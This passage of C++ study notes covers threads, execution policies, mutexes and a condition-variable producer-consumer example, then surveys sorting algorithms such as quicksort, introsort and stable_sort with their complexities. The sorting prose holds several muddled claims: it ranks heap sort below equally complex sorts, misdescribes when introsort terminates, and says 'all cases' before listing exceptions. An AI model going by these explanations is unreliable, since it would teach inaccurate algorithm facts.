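  std::vector<std::thread> threads;

  // Create a handful of threads and keep hold of them
  for (int i = 0; i < 4; ++i)
    threads.emplace_back([i] { std::cout << "thread " << i << '\n'; });

  // Every std::thread must be joined (or detached) before it is destroyed
  for (auto& t : threads)
    t.join();
}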
std::jthread
Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.
Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.
std::execution::seq: execution may not be parallelized
std::execution::par: execution may be parallelized
std::execution::par_unseq: execution may be parallelized, vectorized, or migrated across threads (such as by a parent-stealing scheduler)
std::execution::unseq: execution may be vectorized, e.g., executed on a single thread using instructions that operate on multiple data items

Some of these have an _if version that takes an additional predicate: e.g., std::replace and std::replace_if.
std::sort
std::copy
std::transform
std::accumulate
std::for_each
std::reduce
std::inclusive_scan
std::exclusive_scan
std::transform_reduce
std::remove
std::count
std::max_element
std::min_element
std::find
std::generate
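A hedged sketch of parallelising one of these algorithms with an execution policy (assumes a toolchain with a parallel STL backend, e.g. gcc linked against TBB):

#include <algorithm>
#include <execution>
#include <vector>

int main() {
  std::vector<double> v(10'000'000, 1.5);

  // Same call as the serial version, plus a policy as the first argument;
  // note the policy gives no protection for shared data
  std::sort(std::execution::par, v.begin(), v.end());
}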
std::mutex
A standard way to protect access to something, but there are multiple ways to unlock it.
Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not becoming stuck; see the deadlock chapter for more.
You can use std::scoped_lock with multiple resources or a single one; I think it expresses intention better, by virtue of having “scope” in the name.
std::mutex
std::atomic
std::scoped_lock
std::lock_guard
std::thread and join()
std::jthread (auto join)

See the Standard Library concurrency support library.
#include <iostream>
#include <thread>
#include <mutex>
#include <condition_variable>
#include <queue>

std::mutex m;
std::condition_variable cv;
std::queue<int> q;
const int BufferSize = 10;

void producer() {
  for (int i = 0; i < 50; i++) {
    std::unique_lock<std::mutex> lk(m);
    cv.wait(lk, []{ return q.size() < BufferSize; });
    q.push(i);
    lk.unlock();
    cv.notify_one();
    std::cout << "Produced " << i << std::endl;
  }
}

void consumer() {
  for (int i = 0; i < 50; i++) {
    std::unique_lock<std::mutex> lk(m);
    cv.wait(lk, []{ return !q.empty(); });
    int item = q.front();
    q.pop();
    lk.unlock();
    cv.notify_one();
    std::cout << "Consumed " << item << std::endl;
  }
}

int main() {
  std::thread t1(producer);
  std::thread t2(consumer);
  t1.join();
  t2.join();
  return 0;
}
The Jonathan Boccara CppCon talk 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.
Quicksort is the poster boy of sorting algorithms.
The average time complexity of quicksort is O(n log n); it degrades to O(n^2) in the worst case, but it is usually much faster than simpler sorting algorithms like insertion sort and bubble sort.
Below is a Python implementation just for fun. But how is it implemented in C++?
def quicksort(arr):
    if len(arr) <= 1:
        return arr
    else:
        pivot = arr[len(arr) // 2]
        left = [x for x in arr if x < pivot]
        middle = [x for x in arr if x == pivot]
        right = [x for x in arr if x > pivot]
        return quicksort(left) + middle + quicksort(right)

# Sample input
arr = [3, 6, 8, 10, 1, 2, 1]

# Sample output
print(quicksort(arr))  # [1, 1, 2, 3, 6, 8, 10]
Introsort is a hybrid sorting algorithm that combines the best aspects of both quicksort and heapsort. It is usually the default sorting algorithm used in the C++ Standard Template Library (STL). Introsort begins by sorting the data with quicksort. If the quicksort algorithm fails to make sufficient progress, it switches to heapsort. Introsort can also be tuned to switch to heapsort earlier to reduce the risk of quicksort’s worst-case performance. Introsort terminates when the data is sorted or the maximum recursion depth is reached. Introsort is an efficient and robust sorting algorithm with an average-case complexity of O(n log n).
Introsort is in place but not stable: i.e., equivalent
elements are not guaranteed to remain in the same order. However, the
Standard Library offers stable_
versions of various sorting
algorithms.
If additional memory is available, stable_sort remains O(n log n). However, if it fails to allocate, it will degrade to an O(n (log n)²) algorithm.
https://leanpub.com/cpp-algorithms-guide
The threshold for switching to insertion sort varies for each compiler.
std::list
std::sort
requires random access to the elements, so
std::list
has its own sort method, but it still
(approximately) conforms to O(n log n). It can be implemented with merge
sort as moving elements is cheap with a linked list.
Considerations for choosing an algorithm: the size of the input, and the type of input (e.g., partially sorted, random).
The complexities of various sorting algorithms can vary greatly depending on the algorithm used and the complexity of the data being sorted. Generally speaking, the most common sorting algorithms have the following complexities:
Bubble Sort: O(n²)
Selection Sort: O(n²)
Insertion Sort: O(n²)
Merge Sort: O(n log n)
Quick Sort: O(n log n)
Heap Sort: O(n log n)
As you can see, Merge Sort and Quick Sort are the most efficient algorithms, as they have the lowest complexity, followed by Heap Sort. Bubble Sort and Selection Sort are the least efficient algorithms, as they have the highest complexity.
All of the efficient algorithms are Θ(n log n) in all cases, apart from Timsort, which has an Ω(n) best case, and quicksort, which has a terrible O(n^2) worst case (if we happen to always pick the worst pivot). Quicksort is a good all-rounder with an O(n log n) average case, but it does have an O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully, but an example could be constructed where the chosen pivot is always the worst case.
Mergesort breaks the problem into the smallest units and then merges adjacent pairs.
Timsort finds runs of already sorted elements and then use mergesort; O(n) if already sorted
Heapsort can be thought of as an improved selection sort
Radix sort is a completely different solution to the problem
A sorted array is already a min heap
Comprehensive list of C++ standard library container complexities
Hacking Cpp – a nice breakdown of Standard Library algorithms
Sorting Algorithms: Speed Is Found In The Minds of People - Andrei Alexandrescu - CppCon 2019.